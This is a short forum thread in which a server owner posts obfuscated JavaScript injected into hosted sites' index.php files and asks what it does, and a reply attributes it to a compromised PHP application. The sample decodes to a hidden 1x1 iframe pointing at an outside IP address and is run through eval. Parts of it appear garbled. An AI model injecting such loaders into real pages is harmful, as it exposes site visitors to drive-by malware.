Results 1 to 2 of 2

Thread: SUSE index files being injected with Javascript code.threat?

  1. #1
    pkfrizzlefry NNTP User

    Question SUSE index files being injected with Javascript code.threat?

    Apperently alot of the index.php files on multiple sites i host on a SUSE box hosted on oneandone dedicated server are being injected with javascript code i posted below...

    It opens up a frontpage office install on winxp when you go to the sites...

    Anyone know what the code below is doing and what the threat level is?

    I cleaned it up on some sites but left it on one for now as i dont know what it does

    Anyone know?

    infected site:mybalroom.com

    Greatly apreciate your time
    Pete


    ----code being injected
    <script language='javascript'>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = "";for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyua dhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = "\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\ x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x7 3\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\ x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3 e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\ x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x3 7\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\ x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x7 4\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\ x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0 a"; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script>
    --------END---------

  2. #2
    Join Date
    Jun 2008
    Location
    Finland, European Union
    Posts
    1,879

    Default Re: SUSE index files being injected with Javascript code.thr

    Looks like your server got 'pwned', most likely via a cross scripting vulnerability in some of your software. Remove them all asap.

    What distribution version, what Apache, are you running Suhosin hardening?

    I would investigate all php scripts and similar software running on your server if they've had any security patches as of late - for example phpbb, joomlas, etc. software that you may be running.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •